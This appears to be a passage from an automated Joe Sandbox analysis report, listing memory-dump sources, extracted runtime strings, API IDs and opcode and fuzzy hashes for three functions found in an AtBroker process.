                                                                              Strings
                                                                              • RTL: Resource at %p, xrefs: 04D372A3
                                                                              • RTL: Re-Waiting, xrefs: 04D372C1
                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04D37294
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 885266447-605551621
                                                                              • Opcode ID: 758a5652941759215f3ebca6c5db0687dff8e900425da55cf57377c0bcb811b3
                                                                              • Instruction ID: 3805154fb2167f01cacf1370d64d47e7bab81bf341dc041153058f2d2e1008b3
                                                                              • Opcode Fuzzy Hash: 758a5652941759215f3ebca6c5db0687dff8e900425da55cf57377c0bcb811b3
                                                                              • Instruction Fuzzy Hash: 90412275700602AFD721DF25CC41F66B7A2FB84719F148619FA55EB240EB20FC128BE0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-
                                                                              • API String ID: 1302938615-2137968064
                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction ID: c2207cc812bb5f302e36d80147608c5f2c193fd75952935ac53a9d5144d4d7ce
                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction Fuzzy Hash: 28915F70F0021A9ADB24DE69C881BBEBBA5FF44760F54C51BE855AF2C4E730F9419B60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$@
                                                                              • API String ID: 0-1194432280
                                                                              • Opcode ID: 1607e67c2201028005b94506cddc1dd239c1f7d29f946be851acac9236d68441
                                                                              • Instruction ID: b925540b1a5200ec696cee398432d60bc7a24a1dececa963c29fc65fa11ab636
                                                                              • Opcode Fuzzy Hash: 1607e67c2201028005b94506cddc1dd239c1f7d29f946be851acac9236d68441
                                                                              • Instruction Fuzzy Hash: 3E811BB6D002699BDB31CF54CD45BEAB7B5AB08714F0041DAE909B7250E770AE84DFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%